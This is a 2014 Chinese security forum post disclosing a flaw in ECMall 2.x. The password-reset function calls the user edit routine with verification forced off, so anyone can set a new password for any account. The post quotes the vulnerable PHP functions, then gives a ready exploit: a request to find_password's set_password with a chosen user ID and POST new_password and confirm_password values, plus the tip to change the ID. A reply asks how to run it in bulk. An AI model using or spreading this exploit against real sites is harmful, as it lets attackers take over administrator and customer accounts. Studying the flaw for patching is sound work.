查看: 11556|回复: 1

ecmall2.x修改任意管理员和用户密码

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-5-3 14:34:09 | 显示全部楼层 |阅读模式
    app/find_password.php
    [AppleScript] 纯文本查看 复制代码
    function set_password()
        {
            if (!IS_POST) 
            {
                ......        
            }
            else //POST提交
            {
                if (empty($_POST['new_password']) || empty($_POST['confirm_password']))
                {
                    $this->show_warning("unsettled_required");
                    return ;
                }
                if (trim($_POST['new_password']) != trim($_POST['confirm_password'])) 
                {
                    $this->show_warning("password_not_equal");
                    return ;
                }
                $password = trim($_POST['new_password']);
                $passlen = strlen($password);
                if ($passlen < 6 || $passlen > 20)
                {
                    $this->show_warning('password_length_error');
                    return;
                }
                $id = intval($_GET['id']);//虽然是过滤了,但是不影响利用.
                $word = $this->_rand();
                $md5word = md5($word);
               $ms =& ms();        //连接用户系统
                $ms->user->edit($id, '', array('password' => $password), true); //强制修改 !!问题就出在这儿,false是需要验证的,不知道程序员为什么要设置成非验证修改,偷懒也不是这么偷的吧...            if ($ms->user->has_error())
                {
                    $this->show_warning($ms->user->get_error());
                    return;
                }
                $ret = $this->_password_mod->edit($id, array('activation' => $md5word));
                $this->show_message("edit_success",
                    'login_in', 'index.php?app=member&act=login',
                    'back_index', 'index.php');
                return ;
            }
        }

    includes/passports/default.passport.php
    [AppleScript] 纯文本查看 复制代码
    function edit($user_id, $old_password, $items, $force = false)
     
        {
     
            if (!$force) //为false时需要验证,为ture时直接跳过执行下面的操作
     
            {
     
                $info = $this->get($user_id);
     
                if (md5($old_password) != $info['password'])
     
                {
     
                    $this->_error('auth_failed');
     
     
     
                    return false;
     
                }
     
            }
     
            $edit_data = array();
     
            if (isset($items['password']))
     
            {
     
                $edit_data['password']  = md5($items['password']);
     
            }
     
            if (isset($items['email']))
     
            {
     
                $edit_data['email'] = $items['email'];
     
            }
     
     
     
            if (empty($edit_data))
     
            {
     
                return false;
     
            }
     
            //编辑本地数据
     
            $this->_local_edit($user_id, $edit_data);//跟进
     
     
     
            return true;
     
        }
    

    includes/passport.base.php
    [AppleScript] 纯文本查看 复制代码
    function _local_edit($user_id, $data)
     
        {
     
            $model_member =& m('member');
     
            $model_member->edit($user_id, $data);\\执行update
     
     
     
            return true;
     
        }

    EXP访问:  index.php?app=find_password&act=set_password&id=1
    POST提交   new_password=123456&confirm_password=123456
    记得要修改ID、
    图片3.png

    评分

    参与人数 1i币 +10 收起 理由
    90_ + 10 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2016-6-7 21:48
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-5-3 18:40:28 | 显示全部楼层
    有没办法批量啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 20:56 , Processed in 0.021634 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部